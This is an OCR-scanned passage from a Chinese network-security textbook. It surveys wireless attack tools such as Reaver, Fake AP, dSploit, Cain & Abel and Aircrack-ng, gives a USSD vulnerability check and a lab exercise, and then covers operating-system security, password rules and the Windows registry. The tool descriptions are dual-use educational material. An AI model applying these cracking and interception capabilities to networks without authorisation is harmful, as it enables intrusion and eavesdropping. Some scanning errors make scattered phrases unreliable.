FreeRadius-WPE 是 一 款 针 对 开源 FreeRADIUS 服务 器 的 补丁 程序 , 旨 在 避免 使 用 
802. 1x 无 线 网 络 授权 带 来 的 中 间 人 攻击 。 


7. Reaver 


Reaver 是 一 款 Linux 应 用 程序 ,可 用 来 暴力 攻击 默认 使 用 WPA/WPA2-PSK 安全 协 
议 的 无 线路 由 器 ,并 在 4 一 10 小 时 内 找 出 WPS PIN 和 WPA/WPA2 PSK, 


8. WiFish Finder 


WiFish Finder 是 一 款 开 源 Linux 工具 ,通过 被 动 式 捕获 无 线 网 络 流量 主动 探测 诊断 无 
线 客户 端 漏 洞 。 它 能 收集 无 线 客户 端正 在 发 送 探测 请 求 的 网 络 名 称 、 检 测 网 络 安全 类 型 。 


9. Jasager 


Jasager 基于 Linux 固件 产品 提供 一 套 Linux 工具 来 帮助 检测 存 有 漏洞 的 无 线 客户 端 ， 
和 WiFish Finder 类 似 , 还 能 执行 evil twin 或 者 honey pot 8 iE Yid. 


10. Fake AP 


Fake AP 运行 在 Linux 或 者 BSD 平台 之 上 ,通过 发 送 SSID 信 标 帧 生成 数 千 个 假冒 
AP, 可 用 来 迷惑 IT 管理 员 和 入 侵 检 测 系 统 。 


11. WiFiDEnum 


WiFiDEnum 是 一 个 非常 有 用 的 工具 ,可 以 通过 有 线 ( 或 无 线 ) 网 络 对 主机 进行 扫描 , 找 
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出 所 有 安装 的 无 线 驱 动 程序 ,利用 包含 了 已 知 漏洞 的 本 地 数据 库 发 现存 在 的 威胁 。 
12. dSploit 


dSploit 是 Android 系统 下 的 网 络 分 析 和 渗透 套件 ,其 目的 是 面向 IT 安全 专家 和 爱好 
者 提供 完整 、 先 进 的 专业 工具 包 , 以 便 在 移动 设备 上 进行 网 络 安全 评估 。dSploit 能 够 映射 
网 络 、 发 现 活动 主机 和 运行 的 服务 、 搜 索 已 知 漏洞 .破解 多 种 TCP 协议 登录 及 中 间 人 攻击 
(如 密码 嗅 探 、 实 时 流量 操控 等 )。dSploit 允许 分 析 、 捕 提 和 发 现 网 络 包 , 可 以 扫描 网 络 中 的 
设备 ,比如 手机 、 笔 记 本 ,并 且 识别 操作 系统 .服务 和 开放 端口 ,从 而 有 针对 性 地 进行 深层 次 
的 渗透 测试 。 

安装 在 手机 上 的 dSploit 发 现 mylink 网 络 时 显示 如 图 7-5 所 示 。 


oaea 
[S] asptoiux tts 


选择 一 个 功能 ， 或 长 按 重 命名 


z 192.168.1.0/24 


J 
e mylink (192.168.1.1) 
lem 6C.E: 5:4F E4 ( Your network gateway / router ) 


PC1 (192.168.1.101) 
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图 7-5 dSploit 发 现 网 络 
dSploit 可 以 进行 追踪 及 端口 扫描 `\ 漏 洞 搜索 .登录 破解 数据 包 伪造 等 操作 ,如 图 7-6 


图 7-6 操作 列表 


端口 扫描 结果 如 图 7-7 所 示 。 
13. Wi-Fi 信号 优化 大 师 


Wi-Fi 信号 优化 大 师 是 一 款 能 迅速 优化 周围 Wi-Fi 信号 的 强大 工具 ,特点 为 搜寻 信号 
能 力 强 ,并 且 能 有 效 突破 Wi-Fi 密码 限制 。 
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图 7-7 端口 扫描 结果 


14. Cain & Abel 


Cain & Abel 是 由 Oxid. it 开发 的 一 款 针对 Microsoft 操作 系统 的 免费 口令 恢复 工具 。 
它 的 功能 十 分 强大 , 它 可 以 进行 网 络 嗅 探 , 网 络 欺骗 .破解 加 密 口 令 、 解 码 被 打 乱 的 口令 、 显 
示 口 令 框 ` 显 示 缓 存 口令 和 分 析 路 由 协议 ,甚至 还 可 以 监听 内 网 中 他 人 使 用 VOIP 拨打 电 
话 。 如 7-8 所 示 为 Cain 的 工作 界面 。 
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图 7-8 Cain 工作 界面 


【提示 】 使 用 Android 手机 ,打开 浏览 器 并 尝试 访问 下 面 这 个 地 址 “http:// 
dylanreeve. com/phone. php” 后 ,如 果 马 上 弹出 14 或 15 位 的 IMEI 码 ,表示 此 手机 存在 


实践 


USSD(Unstructured Supplementary Service Data) 远程 撤除 漏 洞 ! 如 果 只 是 弹出 拨号 画面 
且 显 示 * # 06 # ,代表 手机 无 此 USSD 漏洞 。USSD 为 GSM 系统 所 使 用 的 一 种 通信 协定 ， 
使 用 者 透 过 手机 拨号 程式 输入 特定 USSD 指令 之 后 ,可 以 取得 系统 服务 商 提供 的 服务 , 例 
如 查询 预付 卡 余额 等 ,也 用 于 查询 手机 内 部 资讯 .如 x #06# 可 以 查询 手机 IMEI 码 。 部 分 
手机 厂商 使 用 自 定 USSD 指令 对 手机 做 特殊 设 定 或 操作 ,例如 恢复 为 出 厂 设 定 、 开 启 工程 
模式 等 。 


无 线 攻击 审计 套装 Aircrack-ng 包含 的 组 件 具 体 如 表 7-2 所 示 。 
表 7-2 Aircrack-ng 组 件 
组 件 名 称 Ho g 
Aircrack-ng 用 于 WEP, WPA, WPA2 密码 破解 
Airmon-ng 改变 无 线 网 卡 工作 模式 ,以 便 其 他 工具 顺利 使 用 
Airodump-ng 用 于 捕获 无 线 报 文 , 以 便 aircrack-ng 破解 
Aireplay-ng 在 进行 无 线 密码 破解 时 ,创建 特殊 的 攻击 报 文 加 快 破解 速度 
Airserv-ng 可 以 将 无 线 网 卡 连接 至 某 一 特定 端口 ,为 攻击 灵活 调用 做 准备 
Airolib-ng 进行 WPA Rainbow Table 攻击 时 使 用 ,用 于 创建 特定 的 数据 库 文件 
Airdecap-ng 用 于 解 开 处 于 加 密 状 态 的 数据 包 
tools 其 他 用 于 辅助 的 工具 ,如 airdriver-ng , packetforge-ng 


[Us 7-11 无线 网 络 的 搭建 与 安全 检测 


请 使 用 能 够 方便 获得 的 资源 (无 线路 由 器 、 无 线 网 卡 .Wi-Fi 手机 等 均 可 ) 构 建 一 个 无 线 
网 络 ,可 以 分 别 选 择 WEP 和 WPA 进行 安全 设置 ,选择 一 款 软件 从 PC 或 者 Wi-Fi 手机 上 
对 创建 的 网 络 进行 安全 检测 ,请 给 出 完整 的 方案 设计 和 试验 结果 。 
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8.1 操作 系统 安全 概述 
8.1.1 操作 系统 安全 现状 


操作 系统 是 管理 整个 计算 机 硬件 与 软件 资源 的 程序 ,是 网 络 系统 的 
基础 ,是 保证 整个 互联 网 实现 信息 资源 传递 和 共享 的 关键 。 操 作 系统 的 
安全 性 在 网 络 安全 中 举足轻重 。 一 个 安全 的 操作 系统 能 够 保障 计算 机 
资源 使 用 的 保密 性 、 完 整 性 和 可 用 性 ,可 以 对 数据 库 、 应 用 软件 .网络 系 
统 等 提供 全 方位 的 保护 。 没 有 安全 的 操作 系统 的 保护 ,根本 谈 不 上 网 络 
系统 的 安全 ,更 不 可 能 有 应 用 软件 信息 处 理 的 安全 性 。 因 此 ,安全 的 操 
作 系 统 是 整个 信息 系统 安全 的 基础 。 

长 期 以 来 ,我 国 广泛 应 用 的 主流 操作 系统 都 是 从 国外 引进 直接 使 用 
的 产品 ,这些 系统 的 安全 性 令 人 担忧 。 从 认识 论 的 高 度 看 ,人 们 往往 首 
先 关注 对 操作 系统 的 需要 、 功 能 ,然后 才 被 动 地 从 出 现 的 漏洞 和 后 门 以 
及 不 断 引 起 世界 性 “冲击 波 ”" 和 “震荡 波 ” 的 安全 事件 中 注意 到 操作 系统 
本 身 的 安全 问题 。 操 作 系 统 的 结构 和 机 制 不 全 以 及 PC 硬件 结构 的 简 
化 、 系 统 不 分 执行 “ 态 ”内 存 无 越界 保护 等 ,这 些 因素 都 有 可 能 导致 资源 
配置 可 以 被 自 改 ,恶意 程序 被 植 信 执行 ,利用 缓冲 区 溢出 攻击 以 及 非法 
接管 系统 管理 员 权 限 等 安全 事故 发 生 ; 导致 了 病毒 在 世界 范围 内 泛滥 ， 
黑客 利用 各 种 漏洞 攻击 入 侵 , 非 授权 者 任意 窃取 信息 资源 ,使 得 安全 防 
护 体系 形成 了 防火 墙 防 病毒 和 入 侵 检 测 老 三 样 的 被 动 局 面 。 

目前 的 操作 系统 安全 主要 包括 系统 本 身 的 安全 、 物 理 安全 、 旭 辑 安 
全 、 应 用 安全 以 及 管理 安全 等 。 物 理 安全 主要 是 指 系统 设备 及 相关 设 
施 受 到 物理 保护 ,使 之 免 受 破坏 或 丢失 ; ERRE EKI R BEP iB. 
资源 的 安全 ; 管理 安全 主要 包括 各 种 管理 的 安全 政策 和 安全 机 制 。 操 
作 系 统 是 整个 网 络 的 核心 软件 ,操作 系统 的 安全 将 直接 决定 网 络 的 安 
全 ,因此 ,要 从 根本 上 解决 网 络 信息 安全 问题 ,需要 从 系统 工程 的 角度 
来 考虑 ,通过 建立 安全 操作 系统 构建 可 信 计 算 基 (TCB) ,建立 动态 、 完 
整 的 安全 体系 。 操 作 系 统 的 安全 技术 是 其 中 最 为 基本 与 关键 的 技术 
Rs 
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8.1.2 操作 系统 安全 所 涉及 的 几 个 概念 


1. 标识 与 鉴别 


操作 系统 会 自动 为 每 个 用 户 设置 一 个 安全 级 范围 ,标识 用 户 的 安全 等 级 ; 系统 除了 进 
行 身 份 和 口令 的 判别 外 ,还 要 进行 安全 级 判别 ,以 保证 进入 系统 的 用 户 具有 合法 的 身份 标识 
和 安全 级 别 , 即 身份 及 口令 的 鉴别 。 


2. 审计 


审计 就 是 用 于 监视 和 记录 操作 系统 中 有 关 安 全 性 的 活动 ,可 以 有 选择 地 设置 哪些 用 户 、 
哪些 操作 (或 系统 调用 ) 以 及 对 哪些 敏感 资源 的 访问 需要 审计 。 这 些 事件 的 活动 (主要 包括 
事件 的 类 型 .用户 的 身份 .操作 的 时 间 、 参 数 和 状态 等 ) 会 在 系统 中 留 下 痕迹 ,管理 者 通过 检 
查 审 记 日 志 可 以 判断 有 无 危害 安全 性 的 活动 。 


3. 自主 存 取 控 制 


自主 存 取 控 制 用 于 实现 操作 系统 用 户 自己 设 定 的 存 取 控 制 权 限 。 系 统 用 户 可 以 说 明 其 
私有 的 资源 允许 本 系统 中 哪些 用 户 以 何 种 权限 进行 共享 ,系统 中 的 每 个 文件 消息 队 列 、 信 
号 量 集 \ 共 享 存储 区 .目录 和 管道 等 都 可 具有 一 个 存 取 控 制 表 , 用 来 说 明 允 许 系统 中 的 用 户 
对 该 资源 的 存 取 方 式 。 


4. 强制 存 取 控 制 


强制 存 取 控制 提供 了 基于 信息 机 密 性 的 存 取 控制 方法 ,用 于 将 系统 中 的 用 户 和 信息 进 
行 分 级 别 ,分 类 别管 理 , 强 制 限制 信 息 的 共享 和 流动 ,使 不 同 级 别 和 不 同类 别 的 用 户 只 能 访 
问 与 其 相关 的 ,指定 范围 的 信息 ,从 根本 上 防止 信息 的 泄密 和 非 授权 访问 等 现象 。 


5. 设备 安全 性 
设备 安全 性 主要 用 于 控制 文件 卷 .打印 机 、 终 端 等 设备 I/O 信息 的 安全 级 范围 。 


8.1.3 操作 系统 的 安全 管理 


1. 操作 系统 的 安全 要 素 


操作 系统 安全 涉及 多 个 方面 ,美国 专家 对 系统 安全 提出 6 个 方面 , 称 为 操作 系统 安全 六 
XX. 

CD 保密 性 ,是 指 可 以 允许 授权 的 用 户 访问 计算 机 中 的 信息 。 

(2) 完整 性 ,是 指数 据 的 正确 性 和 相 容 性 ,保证 系统 中 保存 的 信息 不 会 被 非 授权 用 户 修 
改 , 且 能 保持 一 致 性 。 

(3) 可 用 性 ,是 指 对 授权 用 户 的 请 求 能 及 时 、 正 确 、 安 全 地 给 予 响应 ,计算 机 中 的 资源 可 
供 授 权 用 户 随时 访问 。 


(4) 真实 性 ,是 指 系统 中 的 信息 要 能 真实 地 反映 现实 世界 ,数据 具有 较 强 的 可 靠 性 。 
(5) 实用 性 ,是 指 系统 中 的 数据 要 具有 实用 性 ,能 为 用 户 提供 基本 的 数据 服务 。 
(6) 占有 性 ,是 指 系统 数据 被 用 户 拥 有 的 特性 。 


2. 安全 管理 


安全 管理 按照 级 别 可 以 分 为 系统 级 安全 管理 ,用户 级 安全 管理 和 文件 级 安全 管理 。 

1) 系统 级 安全 管理 

系统 级 安全 管理 管理 计算 机 环境 的 安全 性 ,其 任务 是 不 允许 未 经 核准 的 用 户 进 入 系统 ， 
从 而 防止 他 人 非法 使 用 系统 的 资源 。 主 要 采用 的 手段 如 下 。 

CD 注册 : 系统 设置 一 张 注册 表 , 记 录 注 册 用 户 的 账户 和 口令 等 信息 ,使 系统 管理 员 能 
掌握 进入 系统 的 用 户 的 情况 ,并 保证 用 户 在 系统 中 的 唯一 性 。 

(2) 登录 : 用 户 每 次 使 用 时 都 要 进行 登录 ,通过 核对 用 户 账户 和 口令 ,核查 该 用 户 的 合 
法 性 。 口 令 很 容易 泄密 ,要求 用 户 定期 修改 口令 ,以 进一步 保证 系统 的 安全 性 。 

一 些 网 络 管理 员 在 创建 账号 的 时 候 往往 用 公司 名 、 计 算 机 名 ,或 者 将 一 些 容易 猜测 到 的 
字符 做 用 户 名 ,然后 又 把 这 些 账 户 的 密码 设置 得 比较 简单 ,比如 “welcome”、“I love you", 
“let me in? 或 者 和 用 户 名 相同 的 字符 串 等 。 这 样 的 账户 应 该 在 首次 登录 的 时 候 更 改 成 复杂 
的 密码 ,还 要 注意 经 常 更 改 密码 。 

好 密码 的 定义 是 安全 期 内 无 法 破解 出 来 的 密码 ,也 就 是 说 ,如 果 得 到 了 密码 文档 ,必须 
花 43 天 或 者 更 长 的 时 间 才 能 破解 出 来 ,密码 策略 是 42 天 之 内 必须 改 密码 。 

所 有 安全 强壮 的 密码 至 少 要 有 下 列 各 方面 的 三 种 。 

° 大 写字 母 , ABCDEF = 

。 小 写字 母 :abc def…… 

。 数字: 1234567890 

* 非 字 母 数 字 的 字符 : OR. RE o 

安全 的 密码 还 要 符合 如 下 规则 。 

。 不 使 用 普通 的 名 字 或 昵称 。 

。 不 使 用 普通 的 个 人 信息 ,如 生日 日 期 。 

。 密码 里 不 含有 重复 的 字母 或 数字 。 

。 至 少 使 用 8 个 字符 。 

2) 用 户 级 安全 管理 

用 户 级 安全 管理 ,是 为 了 给 用 户 文 件 分 配 文件 “访问 权限 ”而 设计 的 。 用 户 对 文件 访问 
权限 的 大 小 ,是 根据 用 户 分 类 、 需 求 和 文件 属性 来 分 配 的 。 例 如 UNIX 中 将 用 户 分 成 文件 
主 , 授 权 用 户 和 一 般 用 户 ,在 系统 中 登录 过 的 用 户 都 具有 指定 的 文件 访问 权限 ,访问 权限 决 
定 了 用 户 对 哪些 文件 能 执行 哪些 操作 。 当 对 某 用 户 赋予 访问 指定 目录 的 权限 时 ,他 便 具 有 
了 对 该 目录 下 所 有 子 目录 和 文件 的 访问 权 。 通 常 ,对 文件 可 以 定义 的 访问 权限 有 建立 、 删 
除 , 打 开 、 读 、 写 、 查 询 和 修改 。 

3) 文件 级 安全 管理 

文件 级 安全 性 是 通过 系统 管理 员 或 文件 主 对 文件 属性 的 设置 ,来 控制 用 户 对 文件 的 访 
问 。 通 常 可 对 文件 设置 的 属性 包括 执行 、 隐 含 、 修 改 . 索 引 、 只 读 、 写 .共享 等 。 
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8.1.4 常用 的 服务 器 操作 系统 


操作 系统 是 大 型 数据 库 系统 的 运行 平台 ,为 数据 库 系统 提供 一 定 程度 的 安全 保护 。 目 
前 操作 系统 平台 大 多 数 集中 在 Windows NT 和 UNIX, 目前 服务 器 常用 的 操作 系统 有 
UNIX,Linux, Windows Server 2000/2003/2008 等 。 这 些 操作 系统 都 是 符合 C2 级 安全 级 
别 的 操作 系统 。 


1. UNIX 系统 


UNIX 操作 系统 是 由 美国 贝尔 实验 室 开发 的 一 种 多 用 户 、 多 任务 的 通用 网 络 操作 系统 。 
UNIX 诞生 于 20 世纪 60 年 代 末 期 ,贝尔 实验 室 的 研究 人 员 于 1969 年 开始 在 GE645 计算 
机 上 实现 一 种 分 时 操作 系统 的 雏形 ,后 来 该 系统 被 移植 到 DEC 的 PDP-7 小 型 机 上 。1970 
年 给 系统 正式 取 名 为 UNIX 操作 系统 。 到 1973 年 ,UNIX 系统 的 绝 大 部 分 源 代码 都 用 C 
语言 重新 编写 ,大 大 提高 了 UNIX 系统 的 可 移植 性 ,也 为 提高 系统 软件 的 开发 效率 创造 了 
条 件 。 

UNIX 操作 系统 目前 已 经 成 为 一 种 成 熟 的 服务 器 主流 操作 系统 ,并 在 发 展 过 程 中 逐步 
形成 了 一 些 新 的 特色 ,主要 包括 5 个 方面 ,为 可 靠 性 高 . 极 强 的 伸缩 性 、 网 络 功 能 强 、. 强 大 的 
数据 库 支 持 功能 以 及 开放 性 好 。 


2. Linux 系统 


Linux 是 一 套 可 以 免费 使 用 和 自由 传播 的 类 UNIX 操作 系统 ,用 户 可 以 免费 获得 其 源 
代码 ,并 能 够 随意 修改 ,主要 用 于 基于 Intel x86 系列 CPU 的 计算 机 上 。 这 个 系统 是 由 全 世 
界 各 地 的 成 千 上 万 的 程序 员 设 计 和 实现 的 。 其 目的 是 建立 不 受 任 何 商品 化 软件 的 版 权 制 约 
的 、 全 世界 都 能 自由 使 用 的 UNIX 兼容 产品 。 

Linux 最 早 由 一 位 名 叫 Linus Torvalds 的 计算 机 业余 爱好 者 开发 ,当时 他 是 芬兰 赫 尔 
辛 基 大 学 的 学 生 , 目 的 是 想 设计 一 个 代替 Minix( 是 由 一 位 名 叫 Andrew Tannebaum 的 计算 
机 教授 编写 的 一 个 操作 系统 示 教 程序 。 这 个 操作 系统 可 用 于 386,486 或 奔腾 处 理 器 的 个 人 
计算 机 上 ,并 且 具 有 UNIX 操作 系统 的 全 部 功能 。) 的 操作 系统 。 

Linux 是 在 共用 许可 证 GPL(General Public License) 保护 下 的 自由 软件 ,也 有 好 几 种 
版 本 ,如 Red Hat Linux, Slackware 以 及 国内 的 Xteam Linux, LM Linux 等 。Linux 的 流 
行 是 因为 它 具 有 许多 优点 ,典型 的 优点 有 7 个 ,如 完全 免费 .完全 兼容 POSIX 1.0 标准、 多 
用 户 多 任务 .良好 的 界面 .丰富 的 网 络 功能 .可 靠 的 安全 稳定 性 能 以 及 支持 多 种 平台 等 。 


3. Windows 系统 


Windows 系统 发 展 经 过 Win9X, WinXP, NT5. 0(Windows 2000) 和 NT6. 0( Windows 
2003) 等 众多 版 本 ,并 逐步 占据 了 广大 中 小 网 络 操作 系统 市 场 。 

Windows NT 以 后 的 操作 系统 具有 以 下 3 方面 优点 。 

(1) 支持 多 种 网 络 协议 。 由 于 在 网 络 中 可 能 存在 多 种 客户 机 ,如 Apple Macintosh、 
UNIX,OS/2 等 ,而 这 些 客 户 机 可 能 使 用 不 同 的 网 络 协议 ,如 TCP/IP HX, IPX/SPX 等 。 


而 Windows NT 以 后 的 操作 系统 操作 支持 几乎 所 有 常见 的 网 络 协议 。 
(2) Pg Internet 功能 。 随 着 Internet 的 流行 和 TCP/IP 协议 组 的 标准 化 , Windows 
NT 以 后 的 操作 系统 都 内 置 了 IISCInternet Information Server) ,可 以 使 网 络 管理 员 轻 松 配 
置 WWW 和 FTP 等 服务 。 
G) 支持 NTFS 文 件 系 统 。Windows 9X 所 使 用 的 文件 系统 是 FAT, fE NT 中 内 置 同 
时 支持 FAT 和 NTFS 的 磁盘 分 区 格式 。 使 用 NTFS 的 好 处 主要 是 可 以 提高 文件 管理 的 安 


全 性 ,用 户 可 以 对 NTFS 系统 中 的 任何 文件 .目录 设置 权限 ,这 样 当 多 用 户 同时 访问 系统 的 
时 候 ,可 以 增加 文件 的 安全 性 。 表 8-1 所 示 为 Windows 家 族 表 。 
表 8-1 Windows 家 族 表 
For DOS. Windows 1. 0(1985) Windows 2. 0(1987) Windows 2. 1(1988) 
早期 windows 3.0(1990) windows 3. 1(1992) Windows 3. 2(1994) 
版 本 Win 9X Windows 95(1995) Windows97(1996) Windows 98(1998) 
Windows 98 SE(1999) Windows Me(2000) 
Windows NT 3. 1(1993) Windows NT 3. 5(1994) Windows NT 3. 51(1995) 
lz Windows NT 4.0(1996) Windows 2000(2000) 
windows XP(2001) Windows Vista(2005) Windows 7(2009) 
客户 端 |Windows Thin PC(2011) Windows 8(2012) Windows RT(2012) 
Windows 8. 1(2013) 
Windows Server 2003(2003) | Windows Server 2008(2008) 
Windows Home Server Windows HPC Server 2008 
BT (2008) (2010) 
RA 服务 器 |Windows Small Business| Windows Essential 
Server(2011) Business Server 
Windows Server 2012(2012) | ^49 WS Server 2012 RA 
(2013) 
Windows PE Windows Azure 
特别 版 本 | Windows Fundamentals for 
Legacy PCs 
y jos Windows Mobile(2000) Windows Phone(2010) 


8.2 Windows 操作 系统 安全 一 一 注册 表 
1 注册 表 的 由 来 


8.2. 


注册 表 源 于 Windows 3. x 操作 系统 ,在 早期 的 Windows 3. x 操作 系统 中 ,注册 表 是 一 
个 极 小 的 文件 ,其 文件 名 为 Reg. dat, 里 面 只 存放 了 某 些 文件 类 型 的 应 用 程序 关联 ,而 操作 
系统 大 部 分 设置 放 在 Win. ini, System. ini 等 多 个 初始 化 INI 文 件 中 。 由 于 这 些 初 始 化 文件 


不 便于 


F 管 理 和 维护 ,时 常 出 现 一 些 因 INI 文 件 遭 到 破坏 而 导致 系统 无 法 启动 的 问题 。 为 了 
使 系统 运行 得 更 为 稳定 、 健 壮 , Windows 95/98 的 设计 师 们 借用 了 Windows NT 中 的 注册 
表 的 思想 ,将 注册 表 引 入 Windows 95/98 操作 系统 中 ,而 且 将 INI 文 件 中 的 大 部 分 设置 也 


Er 
移植 到 注册 表 中 ,因此 ,注册 表 在 Windows 操作 系统 启动 .运行 过 程 中 起 着 重要 的 作用 。 
8.2.2 注册 表 的 作用 


注册 表 是 一 个 记录 32 位 驱动 的 设置 和 位 置 的 数据 库 。 当 操作 系统 需要 存 取 硬 件 设备 
时 ,操作 系统 需要 知道 从 哪里 找到 它们 : 文件 名 、 版 本 号 、 其 他 设置 和 信息 ,没有 注册 表 对 设 
备 的 记录 ,它们 就 不 能 被 使 用 。 当 一 个 用 户 准备 运行 一 个 应 用 程序 时 ,注册 表 提供 应 用 程序 
信息 给 操作 系统 ,这 样 应 用 程序 可 以 被 找到 ,正确 数据 文件 的 位 置 被 规定 ,其 他 设置 也 都 可 
以 被 使 用 。 

注册 表 保存 了 安装 信息 (比如 说 日 期 )、 安 装 软件 的 用 户 、 软 件 版 本 号 和 日 期 .序列 号 等 ， 
根据 安装 软件 的 不 同 , 它 包括 的 信息 也 不 同 。 它 同样 也 保存 了 关于 默认 数据 和 辅助 文件 的 
位 置信 息 .菜单 .按钮 条 、 窗 口 状态 和 其 他 可 选项 。 

通过 修改 注册 表 , 可 以 对 系统 进行 限制 ,优化 ,比如 可 以 设置 与 众 不 同 的 桌面 图 标 和 开 
始 菜单 .设置 不 同 权限 的 人 查看 我 的 电脑 资料 限制 别人 远程 登录 我 的 电脑 或 修改 我 的 注册 
表 等 ,可 以 通过 修改 注册 表 来 达到 目的 。 本 章 后 面 的 实 训 部 分 很 多 都 可 以 采用 改动 注册 表 
的 办 法 来 维护 操作 系统 的 安全 。 


8.2.3 注册 表 中 的 相关 术语 


HKEY :“ 根 键 " 或 “主键 ”, 它 的 图 标 与 资源 管理 器 中 文件 夹 的 图 标 相似 。 

key( 键 ): 它 包含 附加 的 文件 夹 和 一 个 或 多 个 值 。 

subkey( 子 键 ): 在 某 一 个 键 ( 父 键 ) 下 面 出 现 的 键 ( 子 键 ) 。 

branch( 分 支 ) : 代表 一 个 特定 的 子 键 及 其 所 包含 的 一 切 。 一 个 分 支 可 以 从 每 个 注册 
表 的 顶端 开始 ,但 通常 用 以 说 明 一 个 键 和 其 所 有 内 容 。 

value entry( 值 项 ) : 带 有 一 个 名 称 和 一 个 值 的 有 序 值 。 每 个 键 都 可 包含 任何 数量 的 
值 项 。 每 个 值 项 均 由 3 部 分 组 成 为 名 称 .数据 类 型 数据。 

字符 串 (REG_SZ) : 顾名思义 ,就 是 一 串 ASCI 码 字 符 。 如 “Hello World” 就 是 一 串 
文字 或 词组 。 在 注册 表 中 ,字符 串 值 一 般 用 来 表示 文件 的 描述 、 硬 件 的 标识 等 ,通常 
由 字母 和 数字 组 成 。 注 册 表 总 是 在 引号 内 显示 字符 串 。 

二 进 制 (REG_BINARY) : 如 F03D990000BC, 是 没有 长 度 限 制 的 二 进 制 数值 ,在 注 
册 表 编辑 器 中 ,二 进 制 数据 以 十 六 进 制 的 方式 显示 出 来 。 

双 字 (REG_DWORD): 从 字面 上 理解 应 该 是 Double Word, 双 字 节 值 。 由 1 一 8 个 
十 六 进 制 数据 组 成 ,可 用 以 十 六 进 制 或 十 进 制 的 方式 来 编辑 ,如 D1234567。 
Default( 默 认 值 ): 每 一 个 键 至 少 包 括 一 个 值 项 , 称 为 默认 值 (Default) , 它 总 是 一 个 
vp. 


8.2.4 注册 表 的 结构 


注册 表 是 Windows 程序 员 建 造 的 一 个 复杂 的 信息 数据 库 , 它 是 多 层次 式 的 。 由 于 每 台 


计算 机 上 安装 的 设备 .服务 和 程序 有 所 不 同 , 因 此 一 台 计 算 机 上 的 注册 表 内 容 可 能 与 另 一 台 
有 很 大 不 同 。 

选择 “开始 ”一 “运行 "命令 后 ,输入 regedit. exe 命令 打开 * 注 册 表 编辑 器 ”, 就 能 在 其 左 
侧 窗 格 看 到 注册 表 的 分 支 结构 。Windows 2003 注册 表 由 如 下 所 述 5 个 根 键 组 成 。 


1. HKEY_LOCAL MACHINE(HKLM) 


该 键 包含 操作 系统 及 硬件 相关 信息 (如 计算 机 总 线 类 型 .系统 可 用 内 存 、 当 前 装载 了 哪 
些 设备 驱动 程序 以 及 启动 控制 数据 等 ) 的 配置 单元 。 实 际 上 , HKLM 保存 着 注册 表 中 的 大 
部 分 信息 ,因为 男 外 4 个 配置 单元 都 是 其 子 项 的 别名 。 不 同 的 用 户 登录 时 ,此 配置 单元 保持 
不 变 。HKEY_LOCAL_MACHINE(HKLM) 包 括 如 下 子 树 。 
HARDWARE: 在 系统 启动 时 建立 ,包含 了 系统 的 硬件 的 信息 。 
SAM; 包含 了 用 户 账号 和 密码 信息 。 
* SECURITY: 包含 了 所 有 的 安全 配置 信息 。 
* SOFTWARE: 包含 应 用 程序 的 配置 信息 。 
SYSTEM: 包含 了 服务 和 设备 的 配置 信息 。 


2. HKEY_CURRENT_USER 


该 配置 单元 包含 当前 登录 到 由 这 个 注册 表 服 务 的 计算 机 上 的 用 户 的 配置 文件 。 其 子 项 
包括 环境 变量 \ 个 人 程序 组 、 桌 面 设置 网 络 连 接 、 打 印 机 和 应 用 程序 首选 项 ,存储 于 用 户 配 
置 文件 的 ntuser. dat 中 ,优先 于 HKLM 中 相同 关键 字 。 这 些 信息 是 HKEY USERS 配置 
单元 当前 登录 用 户 的 Security ID(SID) 子 项 的 映射 。 


3. HKEY USER(HKU) 


该 配置 单元 包含 的 子 项 含有 当前 计算 机 上 的 所 有 用 户 配置 文件 。 其 中 一 个 子 项 总 是 映 
射 为 HKEY_CURRENT_USER( 通 过 用 户 的 SID 值 )。 另 一 个 子 项 HKEY_USERS\ 
DEFAULT 包含 用 户 登 录 前 使 用 的 信息 。 


4. HKEY CLASSES ROOT(HKCR) 


该 配置 单元 包含 的 子 项 列 出 了 当前 已 在 计算 机 上 注册 的 所 有 COM 服务 器 和 与 应 用 程 
序 相 关联 的 所 有 文件 扩展 名 。 这 些 信息 是 HKEY LOCAL. MACHINENSOFTWAREV 
Classes 子 项 的 映射 。 


5. HKEY_CURRENT_CONFIG(HKCC) 


配置 单元 包含 的 子 项 列 出 了 计算 机 当前 会 话 的 所 有 硬件 配置 信息 。 硬 件 配置 文件 出 现 
于 Windows NT 版 本 4, 它 允许 选择 在 机 器 某 个 指定 的 会 话 中 支持 的 设备 驱动 程序 。 这 些 
信息 是 HKEY LOCAL MACHINE V SYSTEM VCurrentControlSet 子 项 的 映射 ,如 表 8-2 
所 示 。 


实践 


表 8-2 注册 表 键 值 及 说 明 


一 
HKEY LOCAL MACHINE | 本 地 计算 机 系统 的 信息 ,包括 硬件 和 操作 系统 数据 
HKEY CLASSES ROOT 各 种 OLE 技术 和 文件 类 关联 数据 的 信息 
用 户 配置 文件 ,包括 环境 变量 .桌面 设置 .网 络 连接 .打印 机 和 程序 首选 
项 等 
HKEY USERS 动态 加 载 的 用 户 配置 文件 和 默认 的 配置 文件 的 信息 
计算 机 系统 使 用 的 硬件 配置 文件 的 相关 信息 ,用 于 配置 一 些 设置 ,如 要 
HREY-CURRENT-CONFIG | 加 载 的 设备 驱动 程序 .显示 时 要 使 用 的 分 辨认 


HKEY CURRENT USER 


8.2.5 注册 表 的 维护 


Windows 系统 运行 一 段 时 间 后 就 会 逐渐 变 慢 ,甚至 会 慢 到 令 人 难以 忍受 的 程度 ,似乎 
除了 重 做 系统 就 没有 其 他 选择 了 。 其 实 大 多 数 时 候 系统 变 慢 ,只 是 太 多 临时 文件 和 注册 表 
垃圾 造成 的 。Windows 的 注册 表 实 际 上 是 一 个 很 庞大 的 数据 库 , 包 含 了 系统 初始 化 、 应 用 
程序 初始 化 信息 等 一 系列 Windows 运行 信息 和 数据 。 在 一 些 不 需要 的 软件 印 载 后 ， 
Windows 注册 表 中 的 有 关 参 数 往往 不 能 清除 干净 ,会 留 下 大 量 垃 圾 ,使 注册 表 逐 步 增 大 , 腔 
肿 不 堪 。 

手动 清理 注册 表 是 一 件 烦 琐 而 又 危险 的 事情 ,一 般 不 提倡 自己 手动 清理 注册 表 的 垃圾 ， 
但 可 以 使 用 注册 表 维护 软件 ,非常 方便 。 注 册 表 清理 软件 多 种 多 样 , 如 超级 兔子 .Mircosoft 
的 RegCleaner, Wise Registry Cleaner 等 。 

修改 注册 表 可 以 使 用 注册 表 编 辑 器 ,启动 注册 表 编 辑 器 的 名 令 是 regedit 或 regedt32, 
如 选择 “开始 ”>“ 运 行 ”命令 后 输入 regedit 命令 。 


1. 隐藏 重要 文件 /目录 


